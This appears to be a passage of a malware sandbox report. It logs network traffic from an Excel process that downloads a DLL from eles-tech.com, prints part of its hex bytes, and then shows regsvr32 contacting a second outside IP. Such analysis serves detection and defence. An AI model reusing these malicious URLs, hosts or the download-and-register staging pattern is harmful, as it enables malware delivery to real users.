Mar 31, 2022 22:52:05.099303961 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099353075 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099353075 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099404097 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099405050 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099457026 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099457026 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099509001 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099509001 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099561930 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099601984 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099615097 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099617004 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099667072 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099670887 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099721909 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099726915 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099776983 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099785089 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099829912 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099874020 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099883080 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099884033 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099936962 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099940062 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.099987984 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.099988937 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100044012 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100044012 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100099087 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100109100 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100150108 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100157976 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100203037 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100208044 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100254059 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100256920 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100305080 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100306034 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100358009 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100358009 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100409031 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100409985 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100461960 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100465059 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100512981 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100514889 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100564003 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100564957 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100617886 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100619078 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100670099 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100673914 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100723028 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100737095 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100790024 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100790977 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100841999 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100842953 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100894928 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100895882 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100948095 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.100948095 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.100999117 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101000071 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101051092 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101052046 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101102114 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101105928 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101154089 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101155996 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101207018 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101208925 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101258039 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101259947 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101310015 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101324081 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101361036 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101380110 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101413012 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101416111 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101459980 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101466894 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101517916 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101520061 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101568937 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101571083 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101620913 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101623058 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101675034 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101675034 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101727009 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101727009 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101778984 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101778984 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101830959 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101830959 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101881981 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101887941 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101933002 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.101963997 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101979017 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.101985931 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102039099 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102041960 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102088928 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102089882 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102139950 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102139950 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102191925 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102225065 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102277994 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102278948 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102330923 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102332115 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102382898 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102382898 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102432013 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102435112 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102484941 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102626085 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102680922 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102710962 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102765083 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102766991 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102817059 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102818966 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102873087 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102873087 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102925062 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102927923 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.102978945 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.102982044 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103034973 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103041887 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103087902 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103089094 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103142023 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103143930 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103193998 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103194952 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103245974 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103247881 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103301048 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103302956 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103355885 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103357077 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103406906 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103408098 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103458881 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103461981 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103513956 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103514910 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103566885 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103566885 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103620052 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103621960 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103677988 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103678942 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103729010 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103739977 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103792906 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103794098 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103846073 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103846073 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103899956 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.103899956 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103951931 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.103955030 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.104003906 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.104007006 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.104055882 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.104055882 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.104106903 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.104109049 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.104161024 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.104162931 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.104212046 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.104212999 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.104274035 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.104279041 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.104324102 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.269980907 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.270097017 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:10.075155020 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:10.075299025 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:32.105426073 CEST	49166	80	192.168.2.22	68.183.94.239
Mar 31, 2022 22:52:32.343760014 CEST	80	49166	68.183.94.239	192.168.2.22
Mar 31, 2022 22:52:32.343914032 CEST	49166	80	192.168.2.22	68.183.94.239
Mar 31, 2022 22:52:32.431747913 CEST	49166	80	192.168.2.22	68.183.94.239
Mar 31, 2022 22:52:32.669843912 CEST	80	49166	68.183.94.239	192.168.2.22
Mar 31, 2022 22:52:32.686058998 CEST	80	49166	68.183.94.239	192.168.2.22
Mar 31, 2022 22:52:32.686100006 CEST	80	49166	68.183.94.239	192.168.2.22
Mar 31, 2022 22:52:32.686244011 CEST	49166	80	192.168.2.22	68.183.94.239
Mar 31, 2022 22:52:32.687912941 CEST	49166	80	192.168.2.22	68.183.94.239
Mar 31, 2022 22:52:32.701215029 CEST	49166	80	192.168.2.22	68.183.94.239
Mar 31, 2022 22:52:32.942020893 CEST	80	49166	68.183.94.239	192.168.2.22
Mar 31, 2022 22:52:32.942236900 CEST	49166	80	192.168.2.22	68.183.94.239
Mar 31, 2022 22:52:35.707556963 CEST	49166	80	192.168.2.22	68.183.94.239
Mar 31, 2022 22:52:35.989175081 CEST	80	49166	68.183.94.239	192.168.2.22
Mar 31, 2022 22:52:36.604301929 CEST	80	49166	68.183.94.239	192.168.2.22
Mar 31, 2022 22:52:36.604628086 CEST	49166	80	192.168.2.22	68.183.94.239
Mar 31, 2022 22:52:39.605443954 CEST	80	49166	68.183.94.239	192.168.2.22
Mar 31, 2022 22:52:39.605496883 CEST	80	49166	68.183.94.239	192.168.2.22
Mar 31, 2022 22:52:39.605736971 CEST	49166	80	192.168.2.22	68.183.94.239
Mar 31, 2022 22:54:03.981934071 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:54:04.293600082 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:54:04.902111053 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:54:06.134475946 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:54:08.537132978 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:54:13.357950926 CEST	49165	80	192.168.2.22	185.46.40.47

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 31, 2022 22:52:04.120479107 CEST	54206	53	192.168.2.22	8.8.8.8
Mar 31, 2022 22:52:04.138972044 CEST	53	54206	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 31, 2022 22:52:04.120479107 CEST	192.168.2.22	8.8.8.8	0x64ec	Standard query (0)	eles-tech.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 31, 2022 22:52:04.138972044 CEST	8.8.8.8	192.168.2.22	0x64ec	No error (0)	eles-tech.com		185.46.40.47	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

eles-tech.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	185.46.40.47	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Mar 31, 2022 22:52:04.207230091 CEST	2	OUT	GET /css/KzMysMqFMs/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: eles-tech.com Connection: Keep-Alive
Mar 31, 2022 22:52:04.721307993 CEST	3	IN	HTTP/1.1 200 OK Date: Thu, 31 Mar 2022 20:52:02 GMT Server: Apache Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Thu, 31 Mar 2022 20:52:02 GMT Content-Disposition: attachment; filename="eVzUZ7dv5zBAXa5.dll" Content-Transfer-Encoding: binary Set-Cookie: 6246147296b82=1648759922; expires=Thu, 31-Mar-2022 20:53:02 GMT; Max-Age=60; path=/ Last-Modified: Thu, 31 Mar 2022 20:52:02 GMT Content-Length: 868352 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 19 fc 6d bc 5d 9d 03 ef 5d 9d 03 ef 5d 9d 03 ef 0b 82 10 ef 78 9d 03 ef 5d 9d 03 ef 65 9d 03 ef 3f 82 10 ef 4e 9d 03 ef 5d 9d 02 ef 88 9c 03 ef de 81 0d ef 46 9d 03 ef b5 82 09 ef d6 9d 03 ef e5 9b 05 ef 5c 9d 03 ef b5 82 08 ef df 9d 03 ef b5 82 07 ef 5c 9d 03 ef 52 69 63 68 5d 9d 03 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 a7 31 46 62 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 90 07 00 00 f0 05 00 00 00 00 00 10 a9 01 00 00 10 00 00 00 a0 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 0d 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 d5 08 00 ae 01 00 00 00 80 09 00 04 01 00 00 00 c0 09 00 33 34 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 5c 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 8c 09 00 a0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 8e 07 00 00 10 00 00 00 90 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4e 37 01 00 00 a0 07 00 00 40 01 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 98 00 00 00 e0 08 00 00 50 00 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 e5 3c 00 00 00 80 09 00 00 40 00 00 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 33 34 03 00 00 c0 09 00 00 40 03 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 47 89 00 00 00 00 0d 00 00 90 00 00 00 b0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$m]]]x]e?N]F\\Rich]PEL1Fb!34\t.text~ `.rdataN7@@@.data(P@.idata<@0@.rsrc34@p@@.relocG@B
Mar 31, 2022 22:52:04.721391916 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 31, 2022 22:52:04.721446991 CEST	6	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 31, 2022 22:52:04.721499920 CEST	8	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 31, 2022 22:52:04.721554041 CEST	9	IN	Data Raw: bb 92 00 00 e9 06 2b 00 00 e9 31 bc 00 00 e9 fc 1d 00 00 e9 87 1d 00 00 e9 72 96 00 00 e9 cd b3 00 00 e9 48 92 00 00 e9 23 c6 00 00 e9 fe ad 00 00 e9 29 9e 00 00 e9 84 25 00 00 e9 cf 0d 00 00 e9 3a 99 00 00 e9 a5 c3 00 00 e9 c0 d3 00 00 e9 8b 98 Data Ascii: +1rH#)%:\](S$.uOU'PfQ!\&s&>@%[
Mar 31, 2022 22:52:04.721616983 CEST	10	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii:
Mar 31, 2022 22:52:04.721671104 CEST	12	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii:
Mar 31, 2022 22:52:04.721724987 CEST	13	IN	Data Raw: 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc b8 20 a0 07 10 c3 90 90 90 90 90 90 90 90 90 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a ff 68 78 5a 07 10 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 51 53 8b d9 55 56 8d 73 60 57 8b ce Data Ascii: jhxZdPd%QSUVs`WE0D$GD$wb$#hlKh`DhX=hP6hH/h@(h8!h0h hhhL$B7T$\
Mar 31, 2022 22:52:04.721779108 CEST	15	IN	Data Raw: 90 90 90 90 90 90 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a ff 68 c8 5a 07 10 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 5c 8d 4c 24 00 e8 31 e9 ff ff 8d 4c 24 00 c7 44 24 64 00 00 00 00 e8 57 ee 03 00 8d 4c 24 00 c7 44 24 64 ff Data Ascii: jhZdPd%\L$1L$D$dWL$D$dL$\dhjhZdPd%QjP7D$D$t8L$dL$3d
Mar 31, 2022 22:52:04.721832991 CEST	16	IN	Data Raw: 90 90 90 90 90 90 90 90 90 90 90 90 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 51 8d 44 24 02 6a 00 50 6a 02 6a 02 6a 01 51 e8 1f 28 04 00 66 8b 44 24 1a 83 c4 1c c3 90 90 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 0f bf 44 24 04 Data Ascii: QD$jPjjjQ(fD$D$PhjjjjQ'D$T$PRD$hPjjjQ'D$$ D$T$PD$RPhjjjjQq'$
Mar 31, 2022 22:52:04.773739100 CEST	18	IN	Data Raw: 90 90 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 50 68 00 f1 08 10 6a 00 6a 00 6a 04 6a 08 51 e8 eb 22 04 00 83 c4 1c c2 04 00 90 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 51 8d 44 24 02 6a 00 50 6a 02 6a 02 6a 09 51 Data Ascii: D$PhjjjjQ"QD$jPjjjQ"fD$D$PhjjjjQ"QD$jPjjjQ_"fD$D$PhjjjjQ*"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	68.183.94.239	80	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
